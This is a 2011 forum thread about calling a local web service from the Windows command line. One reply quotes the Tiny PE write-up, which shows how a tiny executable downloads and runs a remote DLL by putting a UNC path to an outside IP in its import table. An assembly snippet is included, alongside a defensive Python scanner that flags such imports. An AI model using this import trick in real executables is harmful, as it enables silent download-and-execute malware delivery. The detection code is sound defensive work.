Interests:I'm just a quiet simple person with a very quiet simple life living one day at a time..

European Union

Posted 12 December 2011 - 12:48 AM

Hello,

Internet access is not necessarily available; network connectivity is possible, but in the case I have in mind the idea is to interact with a server running on localhost.

Even with Internet, most times only port 80 is available.

I will explain better.

Right now I'm working on a project called remedium. The UI is web based, and commands from the outside can be issued from the command line using a browser, or with wget if we want to automate things from a script.

For example, one app inside remedium can mount a registry hive using rawreg, and then we can use web requests to add keys, read values, etc. One of the shortcomings of winbuilder was getting output from external apps or requests; using web requests, this is solved in a very elegant manner.

So, it would be nice to have a tool similar to wget on Windows, but I couldn't really find such a tool, which is why I asked the community.

The goal of the Tiny PE challenge was to write the smallest PE file that downloads a file from the Internet and executes it. The standard technique for this is to call URLDownloadToFileA and then WinExec to execute the file. There are many examples of shellcode that use this API, but it requires us to load URLMON.DLL and call multiple functions, which would increase the size of our PE file significantly.

A less known feature of Windows XP is the WebDAV Mini-Redirector. It translates UNC paths used by all Windows applications to URLs and tries to access them over the WebDAV protocol. This means that we can pass a UNC path to WinExec and the redirector will attempt to download the specified file over WebDAV on port 80.

Even more interesting is the fact that you can specify a UNC path in the import section of the PE file. If we specify \\66.93.68.6\z as the name of the imported DLL, the Windows loader will try to download the DLL file from our web server.

This allows us to create a PE file that downloads and executes a file from the Internet without executing a single line of code. All we have to do is put our payload in the DllMain function in the DLL, put the DLL on a publicly accessible WebDAV server and specify the UNC path to the file in the imports section of the PE file. When the loader processes the imports of the PE file, it will load the DLL from the WebDAV server and execute its DllMain function.

; The DLL name should be at most 16 bytes, including the null terminator
dllname: db "\\66.93.68.6\z", 0
times 16-($-dllname) db 0

The size of the PE file with a UNC import is still only 133 bytes.

WARNING: The PE file linked below is live. It will attempt to download and execute a payload DLL from http://66.93.68.6/z. The DLL will display a message box and exit, but you should take proper precautions and treat it as untrusted code.

http://www.phreedom....ar/code/tinype/
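The import-table trick quoted above is easy to check for from the defender's side: a legitimate import entry is a bare DLL name, so any imported name that starts with a UNC prefix is a red flag. The following is an added example (not code from this thread or from the Tiny PE page) that walks a PE file's import descriptors with only the standard library and reports UNC-path DLL names; build_sample_pe is a constructed helper that produces a minimal PE32 purely as sample input.

```python
import struct

def read_imports(data: bytes) -> list:
    """Return the DLL names in a PE file's import directory (PE32 and PE32+)."""
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE file")
    coff = e_lfanew + 4
    nsec = struct.unpack_from("<H", data, coff + 2)[0]
    opt = coff + 20
    opt_size = struct.unpack_from("<H", data, coff + 16)[0]
    magic = struct.unpack_from("<H", data, opt)[0]
    dd_off = opt + (96 if magic == 0x10B else 112)  # data directories (PE32 / PE32+)
    imp_rva = struct.unpack_from("<I", data, dd_off + 8)[0]  # entry 1 = import table
    if imp_rva == 0:
        return []
    sections = []
    for i in range(nsec):
        vsize, vaddr, rsize, rptr = struct.unpack_from("<IIII", data, opt + opt_size + i * 40 + 8)
        sections.append((vaddr, max(vsize, rsize), rptr))
    def rva2off(rva):  # map an RVA to a file offset via the section table
        for vaddr, size, rptr in sections:
            if vaddr <= rva < vaddr + size:
                return rva - vaddr + rptr
        return rva  # header-resident data (as in the 133-byte PE) maps 1:1 onto the file
    names, desc = [], rva2off(imp_rva)
    while True:
        name_rva = struct.unpack_from("<I", data, desc + 12)[0]  # IMAGE_IMPORT_DESCRIPTOR.Name
        if name_rva == 0:  # an all-zero descriptor terminates the table
            break
        off = rva2off(name_rva)
        names.append(data[off:data.index(b"\0", off)].decode("latin-1"))
        desc += 20
    return names

def unc_imports(data: bytes) -> list:
    """Imported DLL names given as UNC paths; the loader would fetch those over SMB/WebDAV."""
    return [n for n in read_imports(data) if n[:2] in ("\\\\", "//")]

def build_sample_pe(dll_name: str) -> bytes:
    """Constructed minimal PE32 (one section, one import descriptor) used only as sample input."""
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)  # e_lfanew = 0x40
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 224, 0x102)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)  # PE32 magic
    struct.pack_into("<II", opt, 104, 0x1000, 40)  # import directory: RVA 0x1000, size 40
    sec = b".idata\0\0" + struct.pack("<IIIIIIHHI", 0x100, 0x1000, 0x200, 0x200, 0, 0, 0, 0, 0xC0000040)
    idata = struct.pack("<IIIII", 0, 0, 0, 0x1028, 0) + b"\0" * 20 + dll_name.encode() + b"\0"
    return (dos + coff + bytes(opt) + sec).ljust(0x200, b"\0") + idata
```

Run unc_imports over the bytes of any executable you want to triage; a non-empty result means the file would make the loader reach out to a remote host before its entry point ever runs.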


Posted 12 December 2011 - 03:47 PM

Thank you.

Very nice find. Using your tip as a starting point, I see that NET USE can be employed for this task.

I can type:

net use z: http://localhost:10101/logtracker

And this command triggers the web service as intended. It doesn't get me the result as a web page on my side, but at least I now have a way to call web pages and trigger reactions, and this is available in every version of Windows since XP.